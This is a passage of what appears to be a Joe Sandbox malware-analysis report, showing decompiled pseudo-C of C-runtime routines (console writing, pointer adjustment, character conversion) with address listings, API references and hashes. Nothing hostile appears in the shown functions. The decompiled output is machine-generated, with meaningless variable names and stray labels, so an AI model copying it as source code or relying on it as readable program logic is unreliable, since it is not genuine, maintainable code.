                                                				_v104 =  *((intOrPtr*)( *((intOrPtr*)(0x203178 + _t291 * 4)) + _t268 + 0x18));
                                                				_v88 = _a16 + _t306;
                                                				_v116 = GetConsoleOutputCP();
                                                				if( *((char*)(_t265 + 0x14)) == 0) {
                                                					E001AF970(_t265);
                                                				}
                                                				_t307 = _a4;
                                                				_v108 =  *((intOrPtr*)( *((intOrPtr*)(_t265 + 0xc)) + 8));
                                                				asm("stosd");
                                                				asm("stosd");
                                                				asm("stosd");
                                                				_t190 = _v100;
                                                				_t292 = _t190;
                                                				_v52 = _t292;
                                                				if(_t190 < _v88) {
                                                					_t300 = _v72;
                                                					_t267 = 0;
                                                					_v76 = 0;
                                                					do {
                                                						_v53 =  *_t292;
                                                						_v68 = _t267;
                                                						_v48 = 1;
                                                						_t273 =  *(0x203178 + _v84 * 4);
                                                						_v80 = _t273;
                                                						if(_v108 != 0xfde9) {
                                                							if(( *(_t300 + _t273 + 0x2d) & 0x00000004) == 0) {
                                                								_t273 =  *_t292 & 0x000000ff;
                                                								if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc)))) + ( *_t292 & 0x000000ff) * 2)) >= _t267) {
                                                									_push(_v64);
                                                									_push(1);
                                                									_push(_t292);
                                                									goto L29;
                                                								} else {
                                                									_t217 =  &(_t292[1]);
                                                									_v60 = _t217;
                                                									if(_t217 >= _v88) {
                                                										 *((char*)(_t300 + _v80 + 0x2e)) =  *_t292;
                                                										 *( *(0x203178 + _v84 * 4) + _t300 + 0x2d) =  *( *(0x203178 + _v84 * 4) + _t300 + 0x2d) | 0x00000004;
                                                										 *((intOrPtr*)(_t307 + 4)) = _v76 + 1;
                                                									} else {
                                                										_t224 = E001B7221(_t273,  &_v68, _t292, 2, _v64);
                                                										_t316 = _t315 + 0x10;
                                                										if(_t224 != 0xffffffff) {
                                                											_t201 = _v60;
                                                											goto L31;
                                                										}
                                                									}
                                                								}
                                                							} else {
                                                								_push(_v64);
                                                								_v36 =  *(_t300 + _t273 + 0x2e) & 0x000000fb;
                                                								_t227 =  *_t292;
                                                								_v35 = _t227;
                                                								 *(_t300 + _t273 + 0x2d) = _t227;
                                                								_push(2);
                                                								_push( &_v36);
                                                								L29:
                                                								_push( &_v68);
                                                								_t200 = E001B7221(_t273);
                                                								_t316 = _t315 + 0x10;
                                                								if(_t200 != 0xffffffff) {
                                                									_t201 = _v52;
                                                									goto L31;
                                                								}
                                                							}
                                                						} else {
                                                							_t229 = _t267;
                                                							_t279 = _t273 + 0x2e + _t300;
                                                							while( *_t279 != _t267) {
                                                								_t229 =  &(_t229->Internal);
                                                								_t279 = _t279 + 1;
                                                								if(_t229 < 5) {
                                                									continue;
                                                								}
                                                								break;
                                                							}
                                                							_t302 = _v88 - _t292;
                                                							_v48 = _t229;
                                                							if(_t229 == 0) {
                                                								_t73 = ( *_t292 & 0x000000ff) + 0x1d52a0; // 0x0
                                                								_t281 =  *_t73 + 1;
                                                								_v80 = _t281;
                                                								if(_t281 > _t302) {
                                                									if(_t302 <= 0) {
                                                										goto L44;
                                                									} else {
                                                										_t309 = _v72;
                                                										do {
                                                											 *((char*)( *(0x203178 + _v84 * 4) + _t309 + _t267 + 0x2e)) =  *((intOrPtr*)(_t267 + _t292));
                                                											_t267 =  &(_t267->Internal);
                                                										} while (_t267 < _t302);
                                                										goto L43;
                                                									}
                                                									L52:
                                                								} else {
                                                									_v132 = _t267;
                                                									_v128 = _t267;
                                                									_v60 = _t292;
                                                									_v48 = (_t281 == 4) + 1;
                                                									_t238 = E001C38C2( &_v132,  &_v68,  &_v60, (_t281 == 4) + 1,  &_v132, _v64);
                                                									_t316 = _t315 + 0x14;
                                                									if(_t238 != 0xffffffff) {
                                                										_t240 =  &(_v52[_v80]);
                                                										_t300 = _v72;
                                                										goto L21;
                                                									}
                                                								}
                                                							} else {
                                                								_t285 = _v72;
                                                								_t243 = _v80 + 0x2e + _t285;
                                                								_v80 = _t243;
                                                								_t246 =  *((char*)(( *_t243 & 0x000000ff) + 0x1d52a0)) + 1;
                                                								_v60 = _t246;
                                                								_t247 = _t246 - _v48;
                                                								_v76 = _t247;
                                                								if(_t247 > _t302) {
                                                									if(_t302 > 0) {
                                                										_t248 = _v52;
                                                										_t310 = _v48;
                                                										do {
                                                											_t286 =  *((intOrPtr*)(_t267 + _t248));
                                                											_t292 =  *(0x203178 + _v84 * 4) + _t285 + _t267;
                                                											_t267 =  &(_t267->Internal);
                                                											_t292[_t310 + 0x2e] = _t286;
                                                											_t285 = _v72;
                                                										} while (_t267 < _t302);
                                                										L43:
                                                										_t307 = _a4;
                                                									}
                                                									L44:
                                                									 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + _t302;
                                                								} else {
                                                									_t287 = _v48;
                                                									_t303 = _t267;
                                                									_t311 = _v80;
                                                									do {
                                                										 *((char*)(_t313 + _t303 - 0x18)) =  *_t311;
                                                										_t303 =  &(_t303->Internal);
                                                										_t311 = _t311 + 1;
                                                									} while (_t303 < _t287);
                                                									_t304 = _v76;
                                                									if(_v76 > 0) {
                                                										E001AA810( &_v28 + _t287, _t292, _t304);
                                                										_t287 = _v48;
                                                										_t315 = _t315 + 0xc;
                                                									}
                                                									_t300 = _v72;
                                                									_t296 = _t267;
                                                									_t312 = _v84;
                                                									do {
                                                										 *( *((intOrPtr*)(0x203178 + _t312 * 4)) + _t300 + _t296 + 0x2e) = _t267;
                                                										_t296 =  &(_t296->Internal);
                                                									} while (_t296 < _t287);
                                                									_t307 = _a4;
                                                									_v112 =  &_v28;
                                                									_v124 = _t267;
                                                									_v120 = _t267;
                                                									_v48 = (_v60 == 4) + 1;
                                                									_t258 = E001C38C2( &_v124,  &_v68,  &_v112, (_v60 == 4) + 1,  &_v124, _v64);
                                                									_t316 = _t315 + 0x14;
                                                									if(_t258 != 0xffffffff) {
                                                										_t240 =  &(_v52[_v76]);
                                                										L21:
                                                										_t201 = _t240 - 1;
                                                										L31:
                                                										_v52 = _t201 + 1;
                                                										_t205 = E001BDD41(_v116, _t267,  &_v68, _v48,  &_v44, 5, _t267, _t267);
                                                										_t315 = _t316 + 0x20;
                                                										_v60 = _t205;
                                                										if(_t205 != 0) {
                                                											if(WriteFile(_v104,  &_v44, _t205,  &_v96, _t267) == 0) {
                                                												L50:
                                                												 *_t307 = GetLastError();
                                                											} else {
                                                												_t292 = _v52;
                                                												_t210 =  *((intOrPtr*)(_t307 + 8)) + _t292 - _v100;
                                                												_v76 = _t210;
                                                												 *((intOrPtr*)(_t307 + 4)) = _t210;
                                                												if(_v96 >= _v60) {
                                                													if(_v53 != 0xa) {
                                                														goto L38;
                                                													} else {
                                                														_t212 = 0xd;
                                                														_v92 = _t212;
                                                														if(WriteFile(_v104,  &_v92, 1,  &_v96, _t267) == 0) {
                                                															goto L50;
                                                														} else {
                                                															if(_v96 >= 1) {
                                                																 *((intOrPtr*)(_t307 + 8)) =  *((intOrPtr*)(_t307 + 8)) + 1;
                                                																 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + 1;
                                                																_t292 = _v52;
                                                																_v76 =  *((intOrPtr*)(_t307 + 4));
                                                																goto L38;
                                                															}
                                                														}
                                                													}
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                						goto L51;
                                                						L38:
                                                					} while (_t292 < _v88);
                                                				}
                                                				L51:
                                                				 *[fs:0x0] = _v16;
                                                				_pop(_t299);
                                                				_pop(_t308);
                                                				_pop(_t266);
                                                				return E001A9545(_t307, _t266, _v20 ^ _t313, _t292, _t299, _t308);
                                                				goto L52;
                                                			}

















































































                                                0x001ba14f
                                                0x001ba151
                                                0x001ba15c
                                                0x001ba15d
                                                0x001ba160
                                                0x001ba165
                                                0x001ba167
                                                0x001ba16d
                                                0x001ba171
                                                0x001ba177
                                                0x001ba17c
                                                0x001ba182
                                                0x001ba185
                                                0x001ba188
                                                0x001ba18b
                                                0x001ba18e
                                                0x001ba191
                                                0x001ba19b
                                                0x001ba1a2
                                                0x001ba1aa
                                                0x001ba1b7
                                                0x001ba1ba
                                                0x001ba1be
                                                0x001ba1be
                                                0x001ba1c6
                                                0x001ba1ce
                                                0x001ba1d3
                                                0x001ba1d4
                                                0x001ba1d5
                                                0x001ba1d6
                                                0x001ba1d9
                                                0x001ba1db
                                                0x001ba1e1
                                                0x001ba1e7
                                                0x001ba1ea
                                                0x001ba1ec
                                                0x001ba1ef
                                                0x001ba1f8
                                                0x001ba1fe
                                                0x001ba201
                                                0x001ba208
                                                0x001ba20f
                                                0x001ba212
                                                0x001ba353
                                                0x001ba376
                                                0x001ba382
                                                0x001ba3b3
                                                0x001ba3b6
                                                0x001ba3b8
                                                0x00000000
                                                0x001ba384
                                                0x001ba384
                                                0x001ba387
                                                0x001ba38d
                                                0x001ba4d7
                                                0x001ba4e5
                                                0x001ba4ee
                                                0x001ba393
                                                0x001ba39d
                                                0x001ba3a2
                                                0x001ba3a8
                                                0x001ba3ae
                                                0x00000000
                                                0x001ba3ae
                                                0x001ba3a8
                                                0x001ba38d
                                                0x001ba355
                                                0x001ba35c
                                                0x001ba35f
                                                0x001ba362
                                                0x001ba364
                                                0x001ba367
                                                0x001ba36e
                                                0x001ba370
                                                0x001ba3b9
                                                0x001ba3bc
                                                0x001ba3bd
                                                0x001ba3c2
                                                0x001ba3c8
                                                0x001ba3ce
                                                0x00000000
                                                0x001ba3ce
                                                0x001ba3c8
                                                0x001ba218
                                                0x001ba21b
                                                0x001ba21d
                                                0x001ba21f
                                                0x001ba223
                                                0x001ba224
                                                0x001ba228
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001ba228
                                                0x001ba22d
                                                0x001ba22f
                                                0x001ba234
                                                0x001ba2f4
                                                0x001ba2fb
                                                0x001ba2fc
                                                0x001ba301
                                                0x001ba4b3
                                                0x00000000
                                                0x001ba4b5
                                                0x001ba4b5
                                                0x001ba4b8
                                                0x001ba4c7
                                                0x001ba4cb
                                                0x001ba4cc
                                                0x00000000
                                                0x001ba4d0
                                                0x00000000
                                                0x001ba307
                                                0x001ba30c
                                                0x001ba312
                                                0x001ba318
                                                0x001ba321
                                                0x001ba32c
                                                0x001ba331
                                                0x001ba337
                                                0x001ba340
                                                0x001ba343
                                                0x00000000
                                                0x001ba343
                                                0x001ba337
                                                0x001ba23a
                                                0x001ba23d
                                                0x001ba243
                                                0x001ba245
                                                0x001ba252
                                                0x001ba253
                                                0x001ba256
                                                0x001ba259
                                                0x001ba25e
                                                0x001ba484
                                                0x001ba486
                                                0x001ba489
                                                0x001ba48c
                                                0x001ba498
                                                0x001ba49b
                                                0x001ba49d
                                                0x001ba49e
                                                0x001ba4a2
                                                0x001ba4a5
                                                0x001ba4a9
                                                0x001ba4a9
                                                0x001ba4a9
                                                0x001ba4ac
                                                0x001ba4ac
                                                0x001ba264
                                                0x001ba264
                                                0x001ba267
                                                0x001ba269
                                                0x001ba26c
                                                0x001ba26e
                                                0x001ba272
                                                0x001ba273
                                                0x001ba274
                                                0x001ba278
                                                0x001ba27d
                                                0x001ba287
                                                0x001ba28c
                                                0x001ba28f
                                                0x001ba28f
                                                0x001ba292
                                                0x001ba295
                                                0x001ba297
                                                0x001ba29a
                                                0x001ba2a3
                                                0x001ba2a7
                                                0x001ba2a8
                                                0x001ba2af
                                                0x001ba2b5
                                                0x001ba2bd
                                                0x001ba2c8
                                                0x001ba2cd
                                                0x001ba2d8
                                                0x001ba2dd
                                                0x001ba2e3
                                                0x001ba2ec
                                                0x001ba346
                                                0x001ba346
                                                0x001ba3d1
                                                0x001ba3d6
                                                0x001ba3e8
                                                0x001ba3ed
                                                0x001ba3f0
                                                0x001ba3f5
                                                0x001ba410
                                                0x001ba4f3
                                                0x001ba4f9
                                                0x001ba416
                                                0x001ba416
                                                0x001ba421
                                                0x001ba423
                                                0x001ba426
                                                0x001ba42f
                                                0x001ba439
                                                0x00000000
                                                0x001ba43b
                                                0x001ba43d
                                                0x001ba43f
                                                0x001ba458
                                                0x00000000
                                                0x001ba45e
                                                0x001ba462
                                                0x001ba468
                                                0x001ba46b
                                                0x001ba471
                                                0x001ba474
                                                0x00000000
                                                0x001ba474
                                                0x001ba462
                                                0x001ba458
                                                0x001ba439
                                                0x001ba42f
                                                0x001ba410
                                                0x001ba3f5
                                                0x001ba2e3
                                                0x001ba25e
                                                0x001ba234
                                                0x00000000
                                                0x001ba477
                                                0x001ba477
                                                0x001ba480
                                                0x001ba4fb
                                                0x001ba500
                                                0x001ba508
                                                0x001ba509
                                                0x001ba50a
                                                0x001ba516
                                                0x00000000

                                                APIs
                                                • GetConsoleOutputCP.KERNEL32(8121A627,00000000,00000000,00000000), ref: 001BA1AD
                                                  • Part of subcall function 001BDD41: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,001BC41B,?,00000000,-00000008), ref: 001BDDED
                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 001BA408
                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 001BA450
                                                • GetLastError.KERNEL32 ref: 001BA4F3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                • String ID:
                                                • API String ID: 2112829910-0
                                                • Opcode ID: 9de23cc8375352c0d40194f97906bbb6be1685c6332cd07bcc6b9dbbf28dd7c7
                                                • Instruction ID: c874c91d4b037d8ffaea9350315504a7a3b5ee88df14359e5ff8e0edec1c46c1
                                                • Opcode Fuzzy Hash: 9de23cc8375352c0d40194f97906bbb6be1685c6332cd07bcc6b9dbbf28dd7c7
                                                • Instruction Fuzzy Hash: 4BD16875D002489FCB05CFE8D884AEDBBB9FF59300F58416AE855EB351D770A942CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 63%
                                                			E001ACA91(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                				signed int* _t52;
                                                				signed int _t53;
                                                				intOrPtr _t54;
                                                				signed int _t58;
                                                				signed int _t61;
                                                				intOrPtr _t71;
                                                				signed int _t75;
                                                				signed int _t79;
                                                				signed int _t81;
                                                				signed int _t84;
                                                				signed int _t85;
                                                				signed int _t97;
                                                				signed int* _t98;
                                                				signed char* _t101;
                                                				signed int _t107;
                                                				void* _t111;
                                                
                                                				_push(0x10);
                                                				_push(0x1d3e58);
                                                				E001AA2B0(__ebx, __edi, __esi);
                                                				_t75 = 0;
                                                				_t52 =  *(_t111 + 0x10);
                                                				_t81 = _t52[1];
                                                				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
                                                					L30:
                                                					_t53 = 0;
                                                					__eflags = 0;
                                                					goto L31;
                                                				} else {
                                                					_t97 = _t52[2];
                                                					if(_t97 != 0 ||  *_t52 < 0) {
                                                						_t84 =  *_t52;
                                                						_t107 =  *(_t111 + 0xc);
                                                						if(_t84 >= 0) {
                                                							_t107 = _t107 + 0xc + _t97;
                                                						}
                                                						 *(_t111 - 4) = _t75;
                                                						_t101 =  *(_t111 + 0x14);
                                                						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
                                                							L10:
                                                							_t54 =  *((intOrPtr*)(_t111 + 8));
                                                							__eflags = _t84 & 0x00000008;
                                                							if((_t84 & 0x00000008) == 0) {
                                                								__eflags =  *_t101 & 0x00000001;
                                                								if(( *_t101 & 0x00000001) == 0) {
                                                									_t84 =  *(_t54 + 0x18);
                                                									__eflags = _t101[0x18] - _t75;
                                                									if(_t101[0x18] != _t75) {
                                                										__eflags = _t84;
                                                										if(_t84 == 0) {
                                                											goto L32;
                                                										} else {
                                                											__eflags = _t107;
                                                											if(_t107 == 0) {
                                                												goto L32;
                                                											} else {
                                                												__eflags =  *_t101 & 0x00000004;
                                                												_t79 = 0;
                                                												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
                                                												__eflags = _t75;
                                                												 *(_t111 - 0x20) = _t75;
                                                												goto L29;
                                                											}
                                                										}
                                                									} else {
                                                										__eflags = _t84;
                                                										if(_t84 == 0) {
                                                											goto L32;
                                                										} else {
                                                											__eflags = _t107;
                                                											if(_t107 == 0) {
                                                												goto L32;
                                                											} else {
                                                												E001AA810(_t107, E001AAEC4(_t84,  &(_t101[8])), _t101[0x14]);
                                                												goto L29;
                                                											}
                                                										}
                                                									}
                                                								} else {
                                                									__eflags =  *(_t54 + 0x18);
                                                									if( *(_t54 + 0x18) == 0) {
                                                										goto L32;
                                                									} else {
                                                										__eflags = _t107;
                                                										if(_t107 == 0) {
                                                											goto L32;
                                                										} else {
                                                											E001AA810(_t107,  *(_t54 + 0x18), _t101[0x14]);
                                                											__eflags = _t101[0x14] - 4;
                                                											if(_t101[0x14] == 4) {
                                                												__eflags =  *_t107;
                                                												if( *_t107 != 0) {
                                                													_push( &(_t101[8]));
                                                													_push( *_t107);
                                                													goto L21;
                                                												}
                                                											}
                                                											goto L29;
                                                										}
                                                									}
                                                								}
                                                							} else {
                                                								_t84 =  *(_t54 + 0x18);
                                                								goto L12;
                                                							}
                                                						} else {
                                                							_t71 =  *0x202ddc; // 0x0
                                                							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
                                                							if(_t71 == 0) {
                                                								goto L10;
                                                							} else {
                                                								 *0x1c7144();
                                                								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
                                                								L12:
                                                								if(_t84 == 0 || _t107 == 0) {
                                                									L32:
                                                									E001B2DB9(_t75, _t84, _t97, _t107);
                                                									asm("int3");
                                                									_push(8);
                                                									_push(0x1d3e78);
                                                									E001AA2B0(_t75, _t101, _t107);
                                                									_t98 =  *(_t111 + 0x10);
                                                									_t85 =  *(_t111 + 0xc);
                                                									__eflags =  *_t98;
                                                									if(__eflags >= 0) {
                                                										_t103 = _t85 + 0xc + _t98[2];
                                                										__eflags = _t85 + 0xc + _t98[2];
                                                									} else {
                                                										_t103 = _t85;
                                                									}
                                                									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
                                                									_t108 =  *(_t111 + 0x14);
                                                									_push( *(_t111 + 0x14));
                                                									_push(_t98);
                                                									_push(_t85);
                                                									_t77 =  *((intOrPtr*)(_t111 + 8));
                                                									_push( *((intOrPtr*)(_t111 + 8)));
                                                									_t58 = E001ACA91(_t77, _t103, _t108, __eflags) - 1;
                                                									__eflags = _t58;
                                                									if(_t58 == 0) {
                                                										_t61 = E001AD7A0(_t103, _t108[0x18], E001AAEC4( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
                                                									} else {
                                                										_t61 = _t58 - 1;
                                                										__eflags = _t61;
                                                										if(_t61 == 0) {
                                                											_t61 = E001AD7B0(_t103, _t108[0x18], E001AAEC4( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
                                                										}
                                                									}
                                                									 *(_t111 - 4) = 0xfffffffe;
                                                									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
                                                									return _t61;
                                                								} else {
                                                									 *_t107 = _t84;
                                                									_push( &(_t101[8]));
                                                									_push(_t84);
                                                									L21:
                                                									 *_t107 = E001AAEC4();
                                                									L29:
                                                									 *(_t111 - 4) = 0xfffffffe;
                                                									_t53 = _t75;
                                                									L31:
                                                									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
                                                									return _t53;
                                                								}
                                                							}
                                                						}
                                                					} else {
                                                						goto L30;
                                                					}
                                                				}
                                                			}



















                                                0x001aca91
                                                0x001aca93
                                                0x001aca98
                                                0x001aca9d
                                                0x001aca9f
                                                0x001acaa2
                                                0x001acaa7
                                                0x001acbb7
                                                0x001acbb7
                                                0x001acbb7
                                                0x00000000
                                                0x001acab6
                                                0x001acab6
                                                0x001acabb
                                                0x001acac5
                                                0x001acac7
                                                0x001acacc
                                                0x001acad1
                                                0x001acad1
                                                0x001acad3
                                                0x001acad6
                                                0x001acadb
                                                0x001acafd
                                                0x001acafd
                                                0x001acb00
                                                0x001acb03
                                                0x001acb21
                                                0x001acb24
                                                0x001acb63
                                                0x001acb66
                                                0x001acb69
                                                0x001acb8e
                                                0x001acb90
                                                0x00000000
                                                0x001acb92
                                                0x001acb92
                                                0x001acb94
                                                0x00000000
                                                0x001acb96
                                                0x001acb96
                                                0x001acb9b
                                                0x001acb9f
                                                0x001acb9f
                                                0x001acba0
                                                0x00000000
                                                0x001acba0
                                                0x001acb94
                                                0x001acb6b
                                                0x001acb6b
                                                0x001acb6d
                                                0x00000000
                                                0x001acb6f
                                                0x001acb6f
                                                0x001acb71
                                                0x00000000
                                                0x001acb73
                                                0x001acb84
                                                0x00000000
                                                0x001acb89
                                                0x001acb71
                                                0x001acb6d
                                                0x001acb26
                                                0x001acb26
                                                0x001acb2a
                                                0x00000000
                                                0x001acb30
                                                0x001acb30
                                                0x001acb32
                                                0x00000000
                                                0x001acb38
                                                0x001acb3f
                                                0x001acb47
                                                0x001acb4b
                                                0x001acb4d
                                                0x001acb50
                                                0x001acb55
                                                0x001acb56
                                                0x00000000
                                                0x001acb56
                                                0x001acb50
                                                0x00000000
                                                0x001acb4b
                                                0x001acb32
                                                0x001acb2a
                                                0x001acb05
                                                0x001acb05
                                                0x00000000
                                                0x001acb05
                                                0x001acae2
                                                0x001acae2
                                                0x001acae7
                                                0x001acaec
                                                0x00000000
                                                0x001acaee
                                                0x001acaf0
                                                0x001acaf9
                                                0x001acb08
                                                0x001acb0a
                                                0x001acbc9
                                                0x001acbc9
                                                0x001acbce
                                                0x001acbcf
                                                0x001acbd1
                                                0x001acbd6
                                                0x001acbdb
                                                0x001acbde
                                                0x001acbe1
                                                0x001acbe4
                                                0x001acbed
                                                0x001acbed
                                                0x001acbe6
                                                0x001acbe6
                                                0x001acbe6
                                                0x001acbf0
                                                0x001acbf4
                                                0x001acbf7
                                                0x001acbf8
                                                0x001acbf9
                                                0x001acbfa
                                                0x001acbfd
                                                0x001acc06
                                                0x001acc06
                                                0x001acc09
                                                0x001acc3f
                                                0x001acc0b
                                                0x001acc0b
                                                0x001acc0b
                                                0x001acc0e
                                                0x001acc25
                                                0x001acc25
                                                0x001acc0e
                                                0x001acc44
                                                0x001acc4e
                                                0x001acc5a
                                                0x001acb18
                                                0x001acb18
                                                0x001acb1d
                                                0x001acb1e
                                                0x001acb58
                                                0x001acb5f
                                                0x001acba3
                                                0x001acba3
                                                0x001acbaa
                                                0x001acbb9
                                                0x001acbbc
                                                0x001acbc8
                                                0x001acbc8
                                                0x001acb0a
                                                0x001acaec
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001acabb

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: AdjustPointer
                                                • String ID:
                                                • API String ID: 1740715915-0
                                                • Opcode ID: 4833c81782e6dd4d34d406b807ea336ee795eefefce6e01c896266e839c9d3f9
                                                • Instruction ID: f4cbe38fffe336b6d58429298b179adaf4c53ddf597bf06db6518ca567c5cfde
                                                • Opcode Fuzzy Hash: 4833c81782e6dd4d34d406b807ea336ee795eefefce6e01c896266e839c9d3f9
                                                • Instruction Fuzzy Hash: AD51F67EA04606AFEB29CF58D842BBA77A4EF16350F14442EE845572D1E732EC40C7E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E001BE15D(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
                                                				intOrPtr _t17;
                                                				intOrPtr _t18;
                                                				intOrPtr _t20;
                                                				intOrPtr _t30;
                                                				char _t32;
                                                				intOrPtr _t40;
                                                				intOrPtr* _t42;
                                                				intOrPtr _t43;
                                                
                                                				_t42 = _a4;
                                                				if(_t42 != 0) {
                                                					_t32 = 0;
                                                					__eflags =  *_t42;
                                                					if( *_t42 != 0) {
                                                						_t17 = E001BDD41(_a16, 0, _t42, 0xffffffff, 0, 0, 0, 0);
                                                						__eflags = _t17;
                                                						if(_t17 != 0) {
                                                							_t40 = _a8;
                                                							__eflags = _t17 -  *((intOrPtr*)(_t40 + 0xc));
                                                							if(__eflags <= 0) {
                                                								L11:
                                                								_t18 = E001B327C(_a16, _t42,  *((intOrPtr*)(_t40 + 8)),  *((intOrPtr*)(_t40 + 0xc)));
                                                								__eflags = _t18;
                                                								if(_t18 != 0) {
                                                									 *((intOrPtr*)(_t40 + 0x10)) = _t18 - 1;
                                                									_t20 = 0;
                                                									__eflags = 0;
                                                								} else {
                                                									E001AFEE7(GetLastError());
                                                									_t20 =  *((intOrPtr*)(E001AFF41()));
                                                								}
                                                								L14:
                                                								return _t20;
                                                							}
                                                							_t20 = E001BE6FF(_t40, __eflags, _t17);
                                                							__eflags = _t20;
                                                							if(_t20 != 0) {
                                                								goto L14;
                                                							}
                                                							goto L11;
                                                						}
                                                						E001AFEE7(GetLastError());
                                                						return  *((intOrPtr*)(E001AFF41()));
                                                					}
                                                					_t43 = _a8;
                                                					__eflags =  *((intOrPtr*)(_t43 + 0xc));
                                                					if(__eflags != 0) {
                                                						L6:
                                                						 *((char*)( *((intOrPtr*)(_t43 + 8)))) = _t32;
                                                						L2:
                                                						 *((intOrPtr*)(_t43 + 0x10)) = _t32;
                                                						return 0;
                                                					}
                                                					_t30 = E001BE6FF(_t43, __eflags, 1);
                                                					__eflags = _t30;
                                                					if(_t30 != 0) {
                                                						return _t30;
                                                					}
                                                					goto L6;
                                                				}
                                                				_t43 = _a8;
                                                				E001B32A0(_t43);
                                                				_t32 = 0;
                                                				 *((intOrPtr*)(_t43 + 8)) = 0;
                                                				 *((intOrPtr*)(_t43 + 0xc)) = 0;
                                                				goto L2;
                                                			}











                                                0x001be164
                                                0x001be169
                                                0x001be187
                                                0x001be189
                                                0x001be18c
                                                0x001be1b5
                                                0x001be1bd
                                                0x001be1bf
                                                0x001be1d8
                                                0x001be1db
                                                0x001be1de
                                                0x001be1ec
                                                0x001be1f9
                                                0x001be1fe
                                                0x001be200
                                                0x001be219
                                                0x001be21c
                                                0x001be21c
                                                0x001be202
                                                0x001be209
                                                0x001be214
                                                0x001be214
                                                0x001be21e
                                                0x00000000
                                                0x001be21e
                                                0x001be1e3
                                                0x001be1e8
                                                0x001be1ea
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001be1ea
                                                0x001be1c8
                                                0x00000000
                                                0x001be1d3
                                                0x001be18e
                                                0x001be191
                                                0x001be194
                                                0x001be1a3
                                                0x001be1a6
                                                0x001be17d
                                                0x001be17d
                                                0x00000000
                                                0x001be180
                                                0x001be19a
                                                0x001be19f
                                                0x001be1a1
                                                0x001be222
                                                0x001be222
                                                0x00000000
                                                0x001be1a1
                                                0x001be16b
                                                0x001be170
                                                0x001be175
                                                0x001be177
                                                0x001be17a
                                                0x00000000

                                                APIs
                                                  • Part of subcall function 001BDD41: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,001BC41B,?,00000000,-00000008), ref: 001BDDED
                                                • GetLastError.KERNEL32 ref: 001BE1C1
                                                • __dosmaperr.LIBCMT ref: 001BE1C8
                                                • GetLastError.KERNEL32(?,?,?,?), ref: 001BE202
                                                • __dosmaperr.LIBCMT ref: 001BE209
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                • String ID:
                                                • API String ID: 1913693674-0
                                                • Opcode ID: 86b979a20a8112f643f04a0e21dad425ca5df33de522af3011576519beff7f21
                                                • Instruction ID: c3c87c9fbfb41f64a12ca9b42b590db91302ec7ff4dbe670c49e9fd5ecc63ab6
                                                • Opcode Fuzzy Hash: 86b979a20a8112f643f04a0e21dad425ca5df33de522af3011576519beff7f21
